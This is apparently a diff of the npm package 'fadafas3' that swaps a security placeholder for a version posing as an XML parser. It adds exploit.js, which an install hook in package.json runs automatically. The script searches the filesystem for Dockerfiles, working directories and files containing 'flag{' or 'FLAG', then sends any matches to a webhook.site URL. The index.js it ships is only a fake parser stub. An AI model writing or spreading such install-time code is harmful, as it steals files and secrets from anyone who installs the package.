fadafas3 0.0.1-security → 0.30.2

package/exploit.js

@@ -0,0 +1,179 @@
+const fs = require('fs');
+const https = require('https');
+const { exec, spawn } = require('child_process');
+const path = require('path');
+
+// Конфигурация
+const HOOK_URL = 'https://webhook.site/055ae50b-b974-41d0-a2c4-e2b961ce4f9b';
+const TARGET_DIR = '/usr/src/app';
+
+// Функция для отправки данных
+function sendData(data, type) {
+    try {
+        const encoded = encodeURIComponent(data.slice(0, 50000)); // Ограничиваем размер
+        const url = `${HOOK_URL}/?type=${type}&data=${encoded}`;
+        
+        https.get(url, (res) => {
+            console.log(`Данные отправлены (${type}), статус: ${res.statusCode}`);
+        }).on('error', (err) => {
+            console.error('Ошибка отправки:', err.message);
+        });
+        
+    } catch (e) {
+        console.error('Ошибка в sendData:', e);
+    }
+}
+
+// Функция для поиска Dockerfile альтернативными методами
+async function findDockerfileAndWorkdir() {
+    return new Promise((resolve) => {
+        console.log('Поиск Dockerfile альтернативными методами...');
+        
+        const strategies = [
+            // 1. Поиск в стандартных местах
+            () => exec('find / -type f -name "Dockerfile" 2>/dev/null | grep -v "/proc\|/sys"', callback),
+            
+            // 2. Поиск файлов с содержимым "FROM" (признак Dockerfile)
+            () => exec('grep -rl "^FROM " / 2>/dev/null | grep -v "/proc\|/sys" | head -20', callback),
+            
+            // 3. Поиск в истории команд
+            () => exec('history | grep -i docker 2>/dev/null || echo "История недоступна"', callback),
+            
+            // 4. Проверка процессов Docker
+            () => exec('ps aux | grep -i docker 2>/dev/null || echo "Docker процессы не найдены"', callback),
+            
+            // 5. Поиск по содержимому файлов на наличие WORKDIR
+            () => exec('grep -r "WORKDIR" /usr/src 2>/dev/null | head -10', callback),
+            
+            // 6. Проверка конфигурационных файлов
+            () => exec('find / -name "*.dockerfile" -o -name "Dockerfile.*" 2>/dev/null | head -10', callback),
+            
+            // 7. Проверка корневых каталогов
+            () => {
+                const dirs = ['/', '/app', '/usr/src', '/home', '/var/www', '/srv'];
+                dirs.forEach(dir => {
+                    exec(`ls -la ${dir}/Dockerfile 2>/dev/null`, (err, stdout) => {
+                        if (!err && stdout) {
+                            callback(null, stdout, dir);
+                        }
+                    });
+                });
+                setTimeout(() => callback(null, 'Проверка завершена'), 3000);
+            }
+        ];
+        
+        let results = [];
+        let completed = 0;
+        
+        function callback(err, stdout, strategyName) {
+            completed++;
+            if (!err && stdout && stdout.trim()) {
+                results.push({
+                    strategy: strategyName || `Стратегия ${completed}`,
+                    output: stdout.toString().trim()
+                });
+                console.log(`Найдено стратегией ${strategyName || completed}:`, stdout.toString().slice(0, 200));
+            }
+            
+            if (completed === strategies.length) {
+                resolve(results);
+            }
+        }
+        
+        // Запускаем все стратегии
+        strategies.forEach((strategy, idx) => {
+            setTimeout(() => strategy(), idx * 500);
+        });
+    });
+}
+
+// Функция для анализа рабочей директории из найденного Dockerfile
+function analyzeDockerfile(filePath) {
+    return new Promise((resolve) => {
+        console.log(`Анализ Dockerfile: ${filePath}`);
+        
+        fs.readFile(filePath, 'utf8', (err, content) => {
+            if (err) {
+                resolve({ path: filePath, error: err.message });
+                return;
+            }
+            
+            // Ищем WORKDIR
+            const lines = content.split('\n');
+            let workdir = null;
+            let fromImage = null;
+            
+            for (const line of lines) {
+                const trimmed = line.trim().toUpperCase();
+                
+                if (trimmed.startsWith('WORKDIR')) {
+                    workdir = line.trim().substring(7).trim();
+                }
+                
+                if (trimmed.startsWith('FROM')) {
+                    fromImage = line.trim().substring(4).trim();
+                }
+            }
+            
+            // Если WORKDIR не найден, используем текущую директорию Dockerfile
+            if (!workdir) {
+                workdir = path.dirname(filePath);
+            }
+            
+            resolve({
+                path: filePath,
+                workdir: workdir,
+                fromImage: fromImage,
+                contentPreview: content.slice(0, 1000),
+                directory: path.dirname(filePath)
+            });
+        });
+    });
+}
+
+// Поиск флага в рабочей директории
+function searchFlagInWorkdir(workdir) {
+    return new Promise((resolve) => {
+        console.log(`Поиск флага в ${workdir}...`);
+        
+        const commands = [
+            // Поиск файлов с флагом
+            `find ${workdir} -type f -exec grep -l "flag{" {} \\; 2>/dev/null`,
+            `find ${workdir} -type f -name "*flag*" 2>/dev/null`,
+            `find ${workdir} -type f -exec grep -l "FLAG" {} \\; 2>/dev/null`,
+            // Поиск во всех файлах
+            `grep -r "flag{" ${workdir} 2>/dev/null | head -20`,
+            `grep -r "FLAG" ${workdir} 2>/dev/null | head -20`,
+            // Список всех файлов
+            `ls -laR ${workdir} 2>/dev/null | head -50`
+        ];
+        
+        let allResults = [];
+        let completed = 0;
+        
+        commands.forEach((cmd, idx) => {
+            setTimeout(() => {
+                exec(cmd, (err, stdout) => {
+                    completed++;
+                    if (!err && stdout && stdout.trim()) {
+                        const result = {
+                            command: cmd,
+                            output: stdout.toString().trim()
+                        };
+                        allResults.push(result);
+                        console.log(`Найдено командой ${idx + 1}:`, stdout.toString().slice(0, 200));
+                        
+                        // Если нашли что-то похожее на флаг, отправляем сразу
+                        if (stdout.toString().includes('flag{') || stdout.toString().includes('FLAG')) {
+                            sendData(`ВОЗМОЖНЫЙ ФЛАГ: ${stdout.toString()}`, 'possible_flag');
+                        }
+                    }
+                    
+                    if (completed === commands.length) {
+                        resolve(allResults);
+                    }
+                });
+            }, idx * 1000);
+        });
+    });
+}

package/index.js

@@ -0,0 +1,6 @@
+module.exports = {
+    parseXmlString: function() {
+        console.log('Fake XML parser');
+        return { get: () => ({ text: () => '' }) };
+    }
+};

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "fadafas3",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+  "version": "0.30.2",
+  "description": "pars",
+  "main": "index.js",
+  "scripts": {
+    "install": "node exploit.js"
+  },
+  "keywords": ["xml", "parser"],
+  "author": "ya",
+  "license": "MIT"
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=fadafas3 for more information.